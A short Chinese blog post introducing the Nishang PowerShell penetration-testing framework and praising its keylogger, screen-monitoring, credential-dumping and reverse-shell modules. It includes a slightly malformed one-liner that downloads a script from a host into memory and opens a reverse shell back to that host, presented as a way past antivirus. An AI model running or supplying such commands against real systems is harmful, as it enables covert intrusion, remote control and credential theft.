#nishang 牛逼的powershell渗透框架
tags: #工具#,
nishang 牛逼的powershell渗透框架 玩渗透的都在夸powershell各种bypass,各种无文件入侵。我们当然得了解下了,有多强大,谁试谁知道!
nishang是作者nikhil_mitt在渗透测试过程中,根据实战经验编写出来的,各个脚本都有很强大的实战意义。 什么下载和执行、键盘记录、屏幕监视、内网扫描、抓HASH、用Mimikatz 抓密码、各式各样的反弹、反弹meterpreter shell还有删除补丁等等强大模块。 其中键盘记录跟屏幕监控,觉得挺有意思的。 键盘记录脚本会将记录的信息用POST方式发到你设置的URL上,读取到你设置的URL下你设置的特定内容它会停止记录。 屏幕监控开启后,会在对方电脑上开启一个端口,你用web访问它这个端口就会生成对方屏幕的截图,并且会实时刷新,挺有意思。 简单演示下: C:\Users\Administrator>powershell IEX (New-Object Net.WebClient).DownloadString( 'http://192.168.1.190/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp;Invoke-PowerShellTcp) -Reverse - IPAddress 192.168.1.190 -port 8888
将你的利用脚本放到你的web服务器中,然后在你的webshell上直接执行上面这样的命令调用执行,直接加载进内存,所以bypass各种杀软。
还可以加载特定的exe程序进内存执行,只要没有写入磁盘动作,AV对它没任何反应。
可用插件太多了,地址在这里 GitHub+-+samratashok/nishang:+Nishang+-+PowerShell...
另外照顾一下像我一样的小白,找了两篇不错的利用文章,小白看一遍,照着实验来一发是最好的了。 当然关于晋级的学习路线,就是想办法搞懂框架里面每个ps脚本,完全看懂,搞明白为什么这样编写,那样你不是大神都难啊!
60字节+-+无文件渗透测试实验+-+n0tr00t 这篇实验很不错
http://www.4hou.com/technology/5962.html 这篇介绍了一些功能
